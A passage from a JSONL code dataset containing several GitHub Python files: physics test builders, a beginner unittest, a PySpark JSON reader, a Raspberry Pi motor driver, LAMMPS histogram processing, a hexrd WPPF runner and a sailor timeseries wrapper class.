convert(12000,\"1/cm\", to=\"int\")\n else:\n gap2 = convert(12300,\"1/cm\", to=\"int\")\n \n energies2 = numpy.zeros(nstates)\n for s in range(nstates):\n energies2[s] = s*gap2\n \n # molecules\n m1 = Molecule(elenergies=energies1)\n m2 = Molecule(elenergies=energies2)\n \n # set transition dipole moments\n dip1 = [0.0, 2.0, 0.0]\n dip2 = [0.0, 1.3, 1.4]\n m1.set_dipole(0, 1, dip1)\n m2.set_dipole(0, 1, dip2)\n \n #set molecular positions\n r1 = [0.0, 0.0, 0.0]\n r2 = [5.0, 0.0, 0.0]\n m1.position = r1\n m2.position = r2\n \n return [m1, m2]\n \n elif (N == 3) and (nst == 2):\n \n nstates = nst\n \n # check inputs\n if nstates != 2:\n raise Exception()\n \n # set parameters\n gap1 = convert(12000, \"1/cm\", to=\"int\")\n energies1 = numpy.zeros(nstates)\n for s in range(nstates):\n energies1[s] = s*gap1\n \n if homo:\n gap2 = convert(12000, \"1/cm\", to=\"int\")\n gap3 = gap2\n else:\n gap2 = convert(12300, \"1/cm\", to=\"int\")\n gap3 = convert(12350, \"1/cm\", to=\"int\")\n energies2 = numpy.zeros(nstates)\n energies3 = numpy.zeros(nstates)\n for s in range(nstates):\n energies2[s] = s*gap2\n energies3[s] = s*gap3\n \n # molecules\n m1 = Molecule(elenergies=energies1)\n m2 = Molecule(elenergies=energies2)\n m3 = Molecule(elenergies=energies3)\n \n # set transition dipole moments\n dip1 = [0.0, 2.0, 0.0]\n dip2 = [0.0, 1.3, 1.4]\n dip3 = [1.0, 1.2, 0.0]\n m1.set_dipole(0, 1, dip1)\n m2.set_dipole(0, 1, dip2)\n m3.set_dipole(0, 1, dip3)\n \n #set molecular positions\n r1 = [0.0, 0.0, 0.0]\n r2 = [5.0, 0.0, 0.0]\n r3 = [0.0, 0.0, 5.0]\n m1.position = r1\n m2.position = r2\n m3.position = r3\n \n return [m1, m2, m3]\n \n else:\n \n return None\n ","repo_name":"tmancal74/quantarhei","sub_path":"quantarhei/builders/aggregate_test.py","file_name":"aggregate_test.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"} +{"seq_id":"33370094197","text":"# !/usr/bin/python3\r\n\r\n# Import\r\nimport unittest\r\nfrom person import Person\r\nfrom Student import Student\r\nfrom Instructor import Instructor\r\n\r\n# Create objects\r\nperson = Person()\r\nstudent = Student()\r\ninstructor = Instructor()\r\n\r\nclass TestClasses(unittest.TestCase) :\r\n \r\n def test_Equal(self) :\r\n self.assertEqual(person.DOB, \"11/11/11\")\r\n self.assertEqual(instructor.salary, \"$45,000.00\")\r\n del person.name\r\n del person.DOB\r\n del instructor.salary\r\n\r\n def test_Is(self) : \r\n self.assertIs(instructor.salary, int())\r\n\r\n def test_None(self) : \r\n self.assertIsNone(person.name)\r\n self.assertIsNone(student.major)\r\n\r\n def test_Init(self) : \r\n self.assertIsNone(person.__init__())\r\n self.assertIsNone(student.__init__())\r\n self.assertIsNone(instructor.__init__())\r\n\r\n def test_Instance(self) : \r\n self.assertIsInstance(person, Person)\r\n self.assertIsInstance(student, Student)\r\n self.assertIsInstance(instructor, Instructor)\r\n\r\nif __name__ == \"__main__\" : \r\n person.name = \"Jack Johnson\"\r\n person.DOB = \"11/11/11\"\r\n instructor.salary = \"$45,000.00\"\r\n unittest.main()\r\n","repo_name":"Topazstix/learning_python","sub_path":"extra/iter_gener_decor/unittest_.py","file_name":"unittest_.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74414044645","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import avg, max, min\nimport sys, json\n\n#create sample data as an array\ndata = [\n {'name':'Jack', 'age':50, 'company name':'Uber'},\n {'name':'Emily', 'age':24, 'company name':'Amazon'}\n]\n\n#define explicit schema\nschema = 'name STRING , age INT, `company name` STRING'\n\nif __name__ == '__main__':\n\n #write json data to file\n jsonstring = json.dumps(data)\n print(jsonstring)\n with open('data.json','w') as f:\n f.write(jsonstring)\n\n #read the json file\n with open('data.json','r') as f:\n print(json.load(f))\n spark = (SparkSession\n .builder\n .appName(sys.argv[0])\n .getOrCreate())\n\n df = spark.read.schema(schema).json('data.json')\n\n df.show()\n","repo_name":"krishansubudhi/sparkparactice","sub_path":"read_json.py","file_name":"read_json.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37153899394","text":"import rospy\n\ntry:\n import RPi.GPIO as GPIO\nexcept:\n import Mock.GPIO as GPIO\n\nfrom joyit.L298N_pin_config import L298NPinConfig\n\nclass L298NDriver:\n def __init__(self,\n name,\n config: L298NPinConfig,\n max_speed=rospy.get_param(\"MAX_SPEED_MOTOR\")) -> None:\n \"\"\"\n Init communication, set default settings, ...\n \"\"\"\n self.name = name\n self.config = config\n self.current_speed = 0\n self.max_speed = max_speed\n\n self.setup_pins()\n\n def setup_pins(self) -> None:\n \"\"\"\n Setup the pins for the L298N driver.\n \"\"\"\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.config.IN1, GPIO.OUT)\n GPIO.setup(self.config.IN2, GPIO.OUT)\n GPIO.setup(self.config.IN3, GPIO.OUT)\n GPIO.setup(self.config.IN4, GPIO.OUT)\n GPIO.setup(self.config.ENA, GPIO.OUT)\n GPIO.setup(self.config.ENB, GPIO.OUT)\n\n # GPIO.PWM finds which channel is used by the pin number\n self.pwm_a = GPIO.PWM(self.config.ENA, rospy.get_param(\"PWM_FREQUENCY\"))\n self.pwm_b = GPIO.PWM(self.config.ENB, rospy.get_param(\"PWM_FREQUENCY\"))\n\n self.pwm_a.start(0)\n self.pwm_b.start(0)\n\n self.set_direction(rospy.get_param(\"DIR_FORWARD\"))\n\n def set_speed(self, speed: int) -> None:\n \"\"\"\n Give a speed that the motor will try to reach.\n \"\"\"\n self.current_speed = min(speed, self.max_speed)\n self.pwm_a.ChangeDutyCycle(self.current_speed)\n self.pwm_b.ChangeDutyCycle(self.current_speed)\n\n def set_direction(self, direction: int) -> None:\n \"\"\"\n Set the direction of the motor.\n \"\"\"\n if direction == rospy.get_param(\"DIR_FORWARD\"):\n GPIO.output(self.config.IN1, 0)\n GPIO.output(self.config.IN2, 1)\n GPIO.output(self.config.IN3, 0)\n GPIO.output(self.config.IN4, 1)\n elif direction == rospy.get_param(\"DIR_BACKWARD\"):\n GPIO.output(self.config.IN1, 1)\n GPIO.output(self.config.IN2, 0)\n GPIO.output(self.config.IN3, 1)\n GPIO.output(self.config.IN4, 0)\n\n def get_speed(self) -> int:\n \"\"\"\n Return current speed of the motor\n \"\"\"\n return self.current_speed\n\n def get_status(self):\n \"\"\"\n Get hardware information from the motor\n \"\"\"\n return {\n \"name\": self.name,\n 'current_speed': self.current_speed,\n }\n\n def cleanup(self):\n \"\"\"\n Cleanup the GPIO pins.\n \"\"\"\n GPIO.cleanup()\n","repo_name":"McFrappe/LAFF-Platooning","sub_path":"src/joyit/src/joyit/L298N_driver.py","file_name":"L298N_driver.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20401321747","text":"import numpy as np\nimport pickle\nimport sys\n\nfrom lammpstools import HistogramLoader, CondensedArray_oTwo, CondensedArray_oThree\n\n\ndef process_histos(basename,eof,pos_bins,cutoff,runslist,nskip=None,\n theta_bins=None,dtype='rdf',varname='c_myhistos',\n histdict=None,runstarts=None,t_start=-1):\n\n \"\"\"\n \n Process multiple runs of a single binned 'histo' type\n of data, and put into a final dictionary with averages of the\n runs and other information.\n\n Parameters\n ----------\n basename : string\n First part of the file name (prior to the run\n number).\n eof : string\n Second part of the file name (after the run number).\n pos_bins : int\n Number of position bins expected in the files.\n cutoff : float\n Distance that binning is cut off at as expected in the\n files.\n runslist : 1D array like of ints\n List of runs to scan over.\n nskip : int (optional)\n Number of position bins to be skipped as expected in\n the files. Default is None. Only used for certain\n values of the 'dtype' argument (see below).\n theta_bins : int (optional)\n Number of theta bins expected in the files. Default\n is None. Only used for certain values of the 'dtype'\n argument (see below).\n dtype : string (optional)\n Type of data to be expected. Acceptable arguments are\n 'rdf', '3bod', or '3bodfull.' Default is 'rdf'.\n varname : string (optional)\n prefix name of header in # row output of data. Default\n is 'c_myhistos'.\n histdict : dict (optional)\n Dictionary labeling columns in the rdf input files and assigning\n them a number in the output files. Default is None, which then\n chooses an appropriate histdict dependent on data type.\n runstarts : 1D list of strings (optional)\n Strings to insert in basename for each different run.\n Length of list should be same as runslist length above.\n Default is None.\n t_start : integer (optional)\n A single start time for all the different runs. Necessary if\n the runs all start at different times to average correctly\n (assuming same end time and time spacing). Default is -1.\n\n Returns\n -------\n finaldict : dictionary\n Contains average values for the different binned quantities,\n as well as other useful information that is shared by all\n runs scanned over.\n missed_runs : list of ints\n Every time a data file from a specific run is missing, the\n run number is appended to this list.\n \n\n \"\"\"\n\n if dtype == 'rdf':\n if histdict == None:\n histdict = {'g' : 2, 'U_1' : 3, 'C_1' : 4, 'U_2' : 5,\n 'C_2' : 6, 'UC' : 7, 'D_2' : 8, 'ncoord' : 9}\n elif dtype == '3bod':\n if nskip == None:\n raise ValueError(\"need nskip argument for dtype='3bod'.\")\n if histdict == None:\n histdict={'g3' : 3 , 'g3cos' : 4}\n elif dtype == '3bodfull':\n if nskip == None:\n raise ValueError(\"need nskip argument for dtype='3bodfull'.\")\n if theta_bins == None:\n raise ValueError(\"need theta_bins argument for dtype='3bodfull' dtype.\")\n if histdict == None:\n histdict={'g3' : 4 }\n\n missed_runs = []\n # store the times of measurement (same for each of the nrun runs)\n times = []\n\n # store all of the measurement data\n histlist = []\n\n print(histdict)\n\n count = 0\n\n nruns = len(runslist)\n tmpname = basename\n for run_index,run in enumerate(runslist):\n\n if runstarts != None:\n basename = tmpname.replace('HERE',runstarts[run_index])\n\n fname = basename + f'{run}'+eof\n print(fname)\n try:\n hl = HistogramLoader(fname)\n except FileNotFoundError:\n missed_runs.append(run)\n print(f'missed run {run} of {fname}')\n\n continue\n\n try:\n dat = hl.data[0]\n\n\n except IndexError:\n missed_runs.append(run)\n print(f'missed run {run} of {fname}')\n continue\n\n\n\n\n if dtype == 'rdf':\n tmpbinnum = pos_bins\n elif dtype == '3bod':\n tmpbinnum = int((pos_bins-2*nskip)*(pos_bins-2*nskip+1))//2\n elif dtype == '3bodfull':\n tmpbinnum = int((pos_bins-2*nskip)*(pos_bins-2*nskip+1)\n *theta_bins)//2\n \n nbins = dat['nbins']\n \n if tmpbinnum != nbins:\n raise ValueError('bin args do not match data length.')\n\n num_neglected_timesteps = 0\n # iterate over each measurement of the run\n for timestep,data_t in enumerate(hl.data):\n\n if int(hl.data[timestep]['timestep']) < t_start:\n num_neglected_timesteps += 1\n continue\n\n if count == 0:\n\n\n # save all times that histograms were measured (same for each run)\n times.append(hl.data[timestep]['timestep'])\n\n\n\n # at each timestep, create arrays of shape \n # (nruns,nbins) for each histogram\n\n histlist.append({})\n\n for key,value in histdict.items():\n histlist[timestep-num_neglected_timesteps][key] = np.empty([nruns,nbins],float)\n\n for key,value in histdict.items():\n histlist[timestep-num_neglected_timesteps][key][count,:] = data_t[f'{varname}[{value}]']\n\n count += 1\n\n if dtype == '3bod':\n eo = CondensedArray_oTwo(pos_bins,nskip)\n reshape = eo.reshape\n\n elif dtype == '3bodfull':\n eo = CondensedArray_oThree(pos_bins,theta_bins,nskip)\n reshape = eo.reshape\n elif dtype == 'rdf':\n\n def reshape(x):\n return x\n\n # list with items containing dicts of averages and std devs\n # at each timestep\n\n estimators = []\n\n\n print(f\"count={count}\")\n for timestep in range(len(hl.data)):\n estimators.append({})\n\n for key,value in histlist[timestep].items():\n estimators[timestep][key] = reshape(np.mean(value[:count,:],axis=0))\n estimators[timestep][key+'_std'] = reshape(np.std(value[:count,:],axis=0))\n\n\n\n rs = (np.linspace(0,float(cutoff),num=pos_bins,endpoint=False)\n +0.5*float(cutoff)/pos_bins)\n\n\n # store final values of \n\n\n\n\n if dtype == '3bod':\n finaldict = {'estimators' : estimators, 'nskip' : nskip, 'r3s' : rs,\n 'timesteps' : times, 'nruns' : count }\n\n elif dtype == '3bodfull':\n thetas = (np.linspace(0,np.pi,num=theta_bins,endpoint=False)\n +0.5*np.pi/theta_bins)\n finaldict = {'estimators' : estimators, 'nskip' : nskip, 'r3s' : rs,\n 'thetas' : thetas, 'timesteps' : times, 'nruns' : count }\n\n elif dtype == 'rdf':\n finaldict = {'estimators' : estimators, 'r' : rs,\n 'timesteps' : times , 'nruns' : count }\n\n return finaldict,missed_runs\n\n\n\nif __name__ == \"__main__\":\n\n\n basename = f'histosbins{bins}cutoff{cutoff}'\n basename += f'_{rho}_{fp}_{epsilon}_{Pi}'\n\n finaldict,missed_runs = process_histos(basename,'.rdf',pos_bins,cutoff,nruns)\n","repo_name":"samueljmcameron/clusterprocess_ss_abp","sub_path":"clusterprocess_ss_abp/process_histos.py","file_name":"process_histos.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22276838076","text":"import copy\n\nfrom PySide2.QtCore import QCoreApplication, QObject, QThreadPool, Signal\n\nfrom hexrd.ui.calibration.wppf_options_dialog import WppfOptionsDialog\nfrom hexrd.ui.constants import OverlayType\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.progress_dialog import ProgressDialog\nfrom hexrd.ui.utils import make_new_pdata\n\n\nclass WppfRunner(QObject):\n\n progress_text = Signal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n self.thread_pool = QThreadPool(self)\n self.progress_dialog = ProgressDialog(parent)\n self.progress_text.connect(self.progress_dialog.setLabelText)\n\n def clear(self):\n self.wppf_options_dialog = None\n\n def run(self):\n self.validate()\n\n # We will go through these steps:\n # 1. Select options\n # 2. Run WPPF\n self.select_options()\n\n def validate(self):\n if not self.visible_powder_overlays:\n raise Exception('At least one visible powder overlay is required')\n\n @property\n def visible_powder_overlays(self):\n return [\n x for x in HexrdConfig().overlays\n if (x['type'] == OverlayType.powder and x['visible'])\n ]\n\n def select_options(self):\n dialog = WppfOptionsDialog(self.parent())\n dialog.accepted.connect(self.wppf_options_selected)\n dialog.rejected.connect(self.clear)\n dialog.show()\n self.wppf_options_dialog = dialog\n\n def wppf_options_selected(self):\n # FIXME: run this in a background thread (code for this is\n # commented out below). The reason we can't do it right now\n # is because the spline background method pops up a dialog\n # with pylab, and we can't interact with it if it is running\n # in a background thread. If that gets changed, we can run\n # this in a background thread.\n self.run_wppf()\n self.wppf_finished()\n\n # Run WPPF in a background thread\n # self.progress_dialog.setWindowTitle('Running WPPF')\n # self.progress_dialog.setRange(0, 0) # no numerical updates\n\n # worker = AsyncWorker(self.run_wppf)\n # self.thread_pool.start(worker)\n\n # worker.signals.result.connect(self.wppf_finished)\n # worker.signals.finished.connect(self.progress_dialog.accept)\n # self.progress_dialog.exec_()\n\n def run_wppf(self):\n dialog = self.wppf_options_dialog\n self.wppf_object = dialog.create_wppf_object()\n\n for i in range(dialog.refinement_steps):\n self.wppf_object.RefineCycle()\n self.rerender_wppf()\n\n self.write_lattice_params_to_materials()\n\n def rerender_wppf(self):\n HexrdConfig().wppf_data = list(self.wppf_object.spectrum_sim.data)\n HexrdConfig().rerender_wppf.emit()\n\n # Process events to make sure it visually updates.\n # If this causes issues, we can post self.wppf_object.RefineCycle()\n # calls to the event loop in the future instead.\n QCoreApplication.processEvents()\n\n def wppf_finished(self):\n self.update_param_values()\n\n def write_lattice_params_to_materials(self):\n for name, wppf_mat in self.wppf_object.phases.phase_dict.items():\n mat = HexrdConfig().material(name)\n\n # Convert units from nm to angstroms\n lparms = copy.deepcopy(wppf_mat.lparms)\n for i in range(3):\n lparms[i] *= 10.0\n\n mat.latticeParameters = lparms\n make_new_pdata(mat)\n HexrdConfig().flag_overlay_updates_for_material(name)\n\n if mat is HexrdConfig().active_material:\n HexrdConfig().active_material_modified.emit()\n\n HexrdConfig().overlay_config_changed.emit()\n\n def update_param_values(self):\n # Update the param values with their new values from the wppf_object\n params = self.params\n if not params:\n return\n\n new_params = self.wppf_object.params\n for k, v in params.items():\n v[0] = new_params[k].value\n\n @property\n def params(self):\n conf = HexrdConfig().config['calibration']\n return conf.get('wppf', {}).get('params')\n\n def update_progress_text(self, text):\n self.progress_text.emit(text)\n","repo_name":"cjh1/hexrdgui","sub_path":"hexrd/ui/calibration/wppf_runner.py","file_name":"wppf_runner.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"41460981958","text":"\"\"\"\nTimeseries module can be used to retrieve timeseries data from the SAP iot abstract timeseries api.\n\nHere we define some convenience wrappers for timeseries data.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom collections.abc import Iterable\nfrom datetime import datetime\nfrom typing import TYPE_CHECKING, Union, Any, Callable\nimport logging\n\nimport pandas as pd\nfrom plotnine import ggplot, geom_point, aes, facet_grid, geom_line\nfrom plotnine.themes import theme\nfrom plotnine.scales import scale_x_datetime\nfrom sklearn.preprocessing import StandardScaler\n\nimport sailor.assetcentral.indicators as ac_indicators\nfrom sailor.utils.plot_helper import _default_plot_theme\nfrom sailor.utils.timestamps import _any_to_timestamp, _calculate_nice_sub_intervals\nfrom sailor.utils.utils import WarningAdapter\n\nif TYPE_CHECKING:\n from ..assetcentral.indicators import IndicatorSet, AggregatedIndicatorSet\n from ..assetcentral.equipment import EquipmentSet\n\nLOG = logging.getLogger(__name__)\nLOG.addHandler(logging.NullHandler())\nLOG = WarningAdapter(LOG)\n\n\nclass TimeseriesDataset(object):\n \"\"\"A Wrapper class to make accessing timeseries data from SAP iot more convenient.\"\"\"\n\n def __init__(self, df: pd.DataFrame, indicator_set: IndicatorSet, equipment_set: EquipmentSet,\n nominal_data_start: pd.Timestamp, nominal_data_end: pd.Timestamp,\n is_normalized: bool = False):\n \"\"\"\n Create a TimeseriesDataset.\n\n indicator_set must be an IndicatorSet containing all indicators occuring in the data columns of the\n dataframe, and equipment_set must be an EquipmentSet containing all equipments occuring in the equipment_id\n column of the data.\n \"\"\"\n self._df = df.query('(timestamp >= @nominal_data_start) & (timestamp < @nominal_data_end)')\n self.is_normalized = is_normalized\n self._equipment_set = equipment_set\n self._indicator_set = indicator_set\n self.nominal_data_start = nominal_data_start\n self.nominal_data_end = nominal_data_end\n self.type = 'EQUIPMENT' # current wrapper type is always 'equipment'\n\n df_equipment_ids = set(df['equipment_id'].unique())\n set_equipment_ids = set(equipment.id for equipment in equipment_set)\n if df_equipment_ids - set_equipment_ids:\n raise RuntimeError('Not all equipment ids in the data are provided in the equipment set.')\n if set_equipment_ids - df_equipment_ids:\n LOG.log_with_warning(\n 'There is no data in the dataframe for some of the equipments in the equipment set.')\n self._equipment_set = self._equipment_set.filter(id=df_equipment_ids)\n\n df_indicator_ids = set(df.columns) - set(self.get_index_columns(include_model=False))\n set_indicator_ids = set(indicator._unique_id for indicator in indicator_set)\n if df_indicator_ids - set_indicator_ids:\n raise RuntimeError('Not all indicator ids in the data are provided in the indicator set.')\n if set_indicator_ids - df_indicator_ids:\n LOG.log_with_warning(\n 'There is no data in the dataframe for some of the indicators in the indicator set.')\n self._indicator_set = self._indicator_set.filter(_unique_id=df_indicator_ids)\n\n @property\n def indicator_set(self):\n \"\"\"Return all Indicators present in the TimeseriesDataset.\"\"\"\n return self._indicator_set\n\n @property\n def equipment_set(self):\n \"\"\"Return all equipment present in the TimeseriesDataset.\"\"\"\n return self._equipment_set\n\n def get_key_columns(self, speaking_names=False, include_model=False):\n \"\"\"\n Return those columns of the data that identify the asset.\n\n Currently we only support asset type 'Equipment' so this will always return columns based on the equipment.\n In the future other types (like System) will be supported here.\n\n Parameters\n ----------\n speaking_names\n False, return key columns\n True, return corresponding names of key columns\n\n Example\n -------\n Get key columns of the indicator data set 'my_indicator_data'::\n\n my_indicator_data.get_key_columns()\n \"\"\"\n if self.type != 'EQUIPMENT':\n raise NotImplementedError('Currently only Equipment is supported as base object for timeseries data.')\n\n if include_model:\n if speaking_names:\n return ['equipment_name', 'model_name']\n else:\n return ['equipment_id', 'model_id']\n else:\n if speaking_names:\n return ['equipment_name']\n else:\n return ['equipment_id']\n\n @staticmethod\n def get_time_column():\n \"\"\"Return the name of the column containing the time information.\"\"\"\n return 'timestamp'\n\n def get_feature_columns(self, speaking_names=False):\n \"\"\"\n Get the names of all feature columns.\n\n Parameters\n ----------\n speaking_names\n False, returns feature columns of a data set\n True, returns corresponding names of feature columns\n\n Example\n -------\n Get Template id, Indicator group name and Indicator name of columns including indicator values in the\n data set 'my_indicator_data'::\n\n my_indicator_data.get_feature_columns(speaking_names=True)\n\n \"\"\"\n if speaking_names:\n return list(self._indicator_set._unique_id_to_names().values())\n return list(self._indicator_set._unique_id_to_constituent_ids().keys())\n\n def get_index_columns(self, speaking_names=False, include_model=False) -> list:\n \"\"\"Return the names of all index columns (key columns and time column).\"\"\"\n return [*self.get_key_columns(speaking_names, include_model), self.get_time_column()]\n\n def as_df(self, speaking_names=False, include_model=False):\n \"\"\"\n Return the data stored within this TimeseriesDataset object as a pandas dataframe.\n\n By default the data is returned with opaque column headers. If speaking_names is set to true, the data is\n converted such that equipment_id and model_id are replaced by human-readable names, and the opaque\n column headers are replaced by a hierarchical index of template_id, indicator_group_name, indicator_name and\n aggregation_function.\n \"\"\"\n if include_model:\n model_ids = pd.DataFrame(\n [(equi.id, equi.model_id) for equi in self._equipment_set], columns=['equipment_id', 'model_id']\n )\n df = pd.merge(self._df, model_ids, on='equipment_id')\n else:\n df = self._df\n\n if speaking_names:\n return self._transform(df, include_model=include_model)\n else:\n return df.set_index(self.get_index_columns(include_model=include_model))\n\n def _transform(self, df, include_model):\n if include_model:\n static_column_mapping = {'equipment_id': 'equipment_name', 'model_id': 'model_name'}\n translator = {'equipment_id': {}, 'model_id': {}}\n for equipment in self._equipment_set:\n translator['equipment_id'][equipment.id] = equipment.name\n translator['model_id'][equipment.model_id] = equipment.model_name\n else:\n static_column_mapping = {'equipment_id': 'equipment_name'}\n translator = {'equipment_id': {}}\n for equipment in self._equipment_set:\n translator['equipment_id'][equipment.id] = equipment.name\n\n data = (\n df.replace(translator)\n .rename(columns=static_column_mapping)\n .set_index(self.get_index_columns(speaking_names=True, include_model=include_model))\n .rename(columns=self._indicator_set._unique_id_to_names())\n )\n if len(data.columns) > 0:\n data.columns = pd.MultiIndex.from_tuples(data.columns)\n\n return data\n\n def plot(self, start=None, end=None, indicator_set=None, equipment_set=None):\n \"\"\"\n Plot the timeseries data stored within this wrapper.\n\n The plot will create different panels for each indicator_group_name and template in the data, as well as each\n indicator. Data from different equipment_set will be represented by different colors. The plotnine object\n returned by this method will be rendered in jupyter notebooks, but can also be further modified by the caller.\n\n Parameters\n ----------\n start\n Optional start time the timeseries data is plotted.\n end\n Optional end time the timeseries data is plotted.\n indicator_set\n Optional Indicators which are plotted.\n equipment_set\n optional equipment which indicator data is plotted.\n\n Returns\n -------\n plot\n Line charts of timeseries data.\n\n Example\n -------\n Plot all Indicators for a period from 2020-07-02 to 2020-09-01 in the data set 'my_indicator_data'::\n\n my_indicator_data.plot('2020-07-02','2020-09-01')\n \"\"\"\n key_vars = self.get_index_columns(include_model=False)\n time_column = self.get_time_column()\n\n if indicator_set is None:\n indicator_set = self._indicator_set\n feature_vars = [indicator._unique_id for indicator in indicator_set]\n name_mapping = indicator_set._unique_id_to_names()\n\n if equipment_set is None:\n equipment_set = self._equipment_set\n equipment_mapping = {equipment.id: equipment.name for equipment in equipment_set}\n selected_equipment_ids = equipment_mapping.keys()\n\n start = _any_to_timestamp(start, default=self._df[time_column].min())\n end = _any_to_timestamp(end, default=self._df[time_column].max())\n\n if self._df.empty:\n raise RuntimeError('There is no data in this dataset.')\n\n data = self._df \\\n .query(f'({time_column} >= @start) & ({time_column} <= @end)') \\\n .query('equipment_id in @selected_equipment_ids') \\\n .filter(items=key_vars + feature_vars)\n result_equipment_ids = set(data['equipment_id'])\n\n if data.empty:\n raise RuntimeError('There is no data in the dataset for the selected equipments and indicators.')\n\n # find equipment_set that are dropped from the plot and log them to the user\n empty_equipment_ids = set(selected_equipment_ids) - result_equipment_ids\n if empty_equipment_ids:\n LOG.log_with_warning(\n f'Following equipment show no data and are removed from the plot: {empty_equipment_ids}')\n selected_equipment_ids = set(selected_equipment_ids) - empty_equipment_ids\n # also indicators without data need to be removed from the plot due to unknown Y axis limits\n empty_indicators = data.columns[data.isna().all()].tolist()\n if empty_indicators:\n # Todo: speaking names in the log below? Currently using our uuid\n LOG.log_with_warning(\n f'Following indicators show no data and are removed from the plot: {empty_indicators}')\n feature_vars = set(feature_vars) - set(empty_indicators)\n\n query_timedelta = end - start\n break_interval = _calculate_nice_sub_intervals(query_timedelta, 5) # at least 5 axis breaks\n first_break = start.floor(break_interval, ambiguous=False, nonexistent='shift_backward')\n last_break = end.ceil(break_interval, ambiguous=False, nonexistent='shift_forward')\n x_breaks = pd.date_range(first_break, last_break, freq=break_interval)\n\n if break_interval < pd.Timedelta('1 day'):\n date_labels = '%Y-%m-%d %H:%M:%S'\n else:\n date_labels = '%Y-%m-%d'\n\n facet_grid_definition = 'indicator + template + indicator_group ~ .'\n facet_assignment = dict(\n template=lambda x: x.Feature.apply(lambda row: name_mapping[row][0]),\n indicator_group=lambda x: x.Feature.apply(lambda row: name_mapping[row][1]),\n indicator=lambda x: x.Feature.apply(lambda row: name_mapping[row][2])\n )\n\n if isinstance(self._indicator_set, ac_indicators.AggregatedIndicatorSet):\n facet_grid_definition = 'aggregation + indicator + template + indicator_group ~ .'\n facet_assignment['aggregation'] = lambda x: x.Feature.apply(lambda row: name_mapping[row][3])\n\n aggregation_interval = _calculate_nice_sub_intervals(query_timedelta, 100) # at leat 100 data points\n groupers = [*self.get_key_columns(include_model=False), pd.Grouper(key=time_column, freq=aggregation_interval)]\n molten_data = (\n data.groupby(groupers)\n .agg('mean')\n .reset_index()\n .dropna(axis=1, how='all')\n .melt(id_vars=key_vars, value_vars=feature_vars, var_name='Feature')\n .assign(**facet_assignment)\n .replace({'equipment_id': equipment_mapping})\n .rename(columns={'equipment_id': 'equipment'})\n )\n\n facet_row_count = len(feature_vars) + len(molten_data.groupby(['template', 'indicator_group']))\n\n plot = (\n ggplot(molten_data, aes(x=self.get_time_column(), y='value', color='equipment')) +\n geom_point() + geom_line() +\n facet_grid(facet_grid_definition, scales='free') +\n _default_plot_theme() +\n theme(figure_size=(10, 3 * facet_row_count)) +\n scale_x_datetime(limits=(start, end), date_labels=date_labels, breaks=x_breaks)\n )\n\n return plot\n\n def normalize(self, fitted_scaler=None, scaler=StandardScaler(copy=True, with_mean=True, with_std=True)) \\\n -> tuple[TimeseriesDataset, Any]:\n \"\"\"\n Normalize a data frame using scaler in normalization_factors.\n\n Parameters\n ----------\n fitted_scaler\n Optional fitted scaler, to be used to normalize self._df\n scaler\n Type of scaler to use for normalization. Default settings implies x -> (x-m)/s, m= mean and s=std.\n Properties are computed along the columns.\n\n Returns\n -------\n new_wrapper\n TimeseriesDataset with self._df updated to be the normalized dataframe.\n fitted_scaler\n Fitted scaler to be used to normalize the data.\n\n Example\n -------\n Get normalized values for indicators in the indicator data set 'My_indicator_data'::\n\n My_indicator_data.normalize()[0]\n \"\"\"\n features = [column for column in self._df.columns if column not in self.get_index_columns(include_model=False)]\n if fitted_scaler is None and self.is_normalized:\n raise RuntimeError(\"There is no fitted scaler but dataset is already normalized.\")\n if fitted_scaler is None:\n # normalize the data and save normalization factors to normalization_factors\n fitted_scaler = scaler.fit(self._df[features])\n LOG.debug('No scaler provided for normalization, fitting scaler to dataset: %s', fitted_scaler)\n\n normalized_df = self._df.copy()\n normalized_df[features] = fitted_scaler.transform(normalized_df[features])\n new_wrapper = TimeseriesDataset(normalized_df, self._indicator_set,\n self._equipment_set,\n self.nominal_data_start, self.nominal_data_end,\n is_normalized=True)\n\n return new_wrapper, fitted_scaler\n\n def filter(self, start: Union[str, pd.Timestamp, datetime] = None,\n end: Union[str, pd.Timestamp, datetime] = None, equipment_set: EquipmentSet = None,\n indicator_set: Union[IndicatorSet, AggregatedIndicatorSet] = None) -> TimeseriesDataset:\n \"\"\"Return a new TimeseriesDataset extracted from an original data with filter parameters.\n\n Only indicator data specified in filters are returned.\n\n Parameters\n ----------\n start\n Optional start time of timeseries data are returned.\n end\n Optional end time until timeseries data are returned.\n equipment_set\n Optional EquipmentSet to filter timeseries data. Takes precedence over equipment_ids.\n indicator_set:\n Optional IndicatorSet to filter dataset columns.\n\n Example\n -------\n Filter out indicator data for an equipment 'MyEquipmentId' from the indicator data 'My_indicator_data'::\n\n My_indicator_data.filter(MyEquipmentId)\n \"\"\"\n start_time = _any_to_timestamp(start, default=self.nominal_data_start)\n end_time = _any_to_timestamp(end, default=self.nominal_data_end)\n\n if equipment_set:\n # we need to filter the user's choice before creating a new TSDataset\n # since they can specify an arbitrary equipment set which could not be in the TSDataset\n equipment_ids = [equipment.id for equipment in equipment_set]\n selected_equi_set = self._equipment_set.filter(id=equipment_ids)\n else:\n selected_equi_set = self._equipment_set\n\n equipment_ids = [equipment.id for equipment in selected_equi_set]\n\n selected_df = self._df.query('(equipment_id in @equipment_ids) &'\n '(timestamp >= @start_time) & (timestamp < @end_time)')\n\n if indicator_set is not None:\n selected_column_ids = [indicator._unique_id for indicator in indicator_set]\n selected_df = selected_df[self.get_index_columns(include_model=False) + selected_column_ids]\n selected_indicator_set = 